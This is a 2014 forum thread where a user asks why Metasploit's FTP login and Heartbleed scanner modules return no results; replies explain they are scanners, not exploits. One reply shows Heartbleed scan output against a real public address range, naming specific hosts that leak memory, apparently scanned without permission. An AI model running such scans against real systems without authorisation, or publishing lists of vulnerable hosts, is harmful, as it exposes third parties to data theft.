duaneg Posted April 16, 2014 Posted April 16, 2014 (edited) I've attempted this from 2 computers and through VMWare.. Using any exploit and connected to any host and port, the only thing that returns is the following.. No successful exploit. msf > use auxiliary/scanner/ftp/ftp_login msf auxiliary(ftp_login) > set RHOSTS 127.0.0.1 RHOSTS => 127.0.0.1 msf auxiliary(ftp_login) > exploit [*] 127.0.0.1:21 - Starting FTP login sweep [*] Connecting to FTP server 127.0.0.1... [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed or msf > use auxiliary/scanner/ssl/openssl_heartbleed msf auxiliary(openssl_heartbleed) > set RHOSTS 69.7.179.*** RHOSTS => 69.7.179.*** msf auxiliary(openssl_heartbleed) > set RPORT 443 RPORT => 443 msf auxiliary(openssl_heartbleed) > exploit [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed I don't ever get any results back.. Just scanned host and execution complete... :\ Any idea? Edited April 16, 2014 by duaneg Quote
Guest spazi Posted April 16, 2014 Posted April 16, 2014 what version of openSSL does your server have? Quote
digininja Posted April 16, 2014 Posted April 16, 2014 Is there an ftp server running on your local host and is the remote site vulnerable to Heartbleed? Secondary question to that, do you have permission to be scanning it? Quote
hexophrenic Posted April 21, 2014 Posted April 21, 2014 You know that is a scanner, not an exploit, right? You will not get a sessions using either of these modules, typically only output on the screen. Quote
raz0r Posted April 24, 2014 Posted April 24, 2014 Wiki brother The affected versions of OpenSSL are OpenSSL 1.0.1 through 1.0.1f (inclusive). Later versions (1.0.1g and ulterior[59]) and previous versions (1.0.0 branch and older) are not vulnerable.[60] Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS.[27] have you lot never herd of shodehq ?? http://www.shodanhq.com/search?q=OpenSSL+1.0.1 [-] 78.110.170.5:443 - Protocol error. Looks like the chosen protocol is not supported. [-] 78.110.170.8:443 - Protocol error. Looks like the chosen protocol is not supported. [+] 78.110.170.9:443 - Heartbeat response with leak [+] 78.110.170.11:443 - Heartbeat response with leak [-] 78.110.170.22:443 - Protocol error. Looks like the chosen protocol is not supported. [-] 78.110.170.23:443 - Protocol error. Looks like the chosen protocol is not supported. [*] Scanned 026 of 256 hosts (010% complete) [+] 78.110.170.26:443 - Heartbeat response with leak [-] 78.110.170.28:443 - Protocol error. Looks like the chosen protocol is not supported. [*] Scanned 052 of 256 hosts (020% complete) [-] 78.110.170.66:443 - Protocol error. Looks like the chosen protocol is not supported. [+] 78.110.170.67:443 - Heartbeat response with leak [-] 78.110.170.75:443 - Protocol error. Looks like the chosen protocol is not supported. [*] Scanned 077 of 256 hosts (030% complete) [-] 78.110.170.94:443 - Protocol error. Looks like the chosen protocol is not supported. [*] Scanned 103 of 256 hosts (040% complete) [*] Scanned 128 of 256 hosts (050% complete) [-] 78.110.170.141:443 - Protocol error. Looks like the chosen protocol is not supported. [-] 78.110.170.142:443 - Protocol error. Looks like the chosen protocol is not supported. [-] 78.110.170.143:443 - Protocol error. Looks like the chosen protocol is not supported. [-] 78.110.170.145:443 - Protocol error. Looks like the chosen protocol is not supported. [-] 78.110.170.152:443 - Protocol error. Looks like the chosen protocol is not supported. [*] Scanned 154 of 256 hosts (060% complete) [-] 78.110.170.159:443 - Protocol error. Looks like the chosen protocol is not supported. [*] Scanned 180 of 256 hosts (070% complete) Kinda worrying !!! Raz0r Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.